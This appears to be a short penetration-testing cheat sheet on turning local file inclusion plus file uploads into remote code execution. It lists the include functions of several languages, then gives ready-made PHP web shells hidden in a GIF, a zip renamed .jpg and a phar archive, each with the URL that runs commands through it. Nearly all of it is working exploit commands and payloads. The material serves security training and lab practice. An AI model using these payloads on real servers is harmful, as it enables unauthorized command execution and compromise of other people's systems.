b0ysie7e

Appearance

LFI and File Uploads

Function

PHP

c
include()/include_once()
require()/require_once()

NodeJS

c
res.render()

Java

c
import

.NET

c
include

Image upload

Crafting Malicious Image

c
$ echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
c
http://<SERVER_IP>:<PORT>/settings.php

Uploaded File Path

html
<img src="/profile_images/shell.gif" class="profile-image" id="profile-image">
c
http://<SERVER_IP>:<PORT>/index.php?language=./profile_images/shell.gif&cmd=id

Zip Upload

c
$ echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
c
http://<SERVER_IP>:<PORT>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id

Phar Upload

php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();
php
$ php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
c
http://<SERVER_IP>:<PORT>/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id